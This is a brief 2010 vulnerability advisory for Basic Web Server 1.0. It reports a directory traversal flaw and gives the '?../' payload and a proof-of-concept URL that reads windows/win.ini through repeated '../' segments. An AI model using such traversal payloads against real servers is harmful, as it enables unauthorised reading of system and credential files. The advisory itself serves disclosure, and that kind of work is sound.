------------------------------------------------------------------------
Software................Basic Web Server 1.0
Vulnerability...........Directory Traversal
Download................http://www.bit4free.com/
Release Date............9/19/2010
Tested On...............Windows XP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://www.johnleitch.net/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------

--Description--

A directory traversal vulnerability in Basic Web Server 1.0 can be
exploited to read files outside of the webroot directory.


--Exploit--

?../


--PoC--

http://localhost/?../../../../../../../../../../windows/win.ini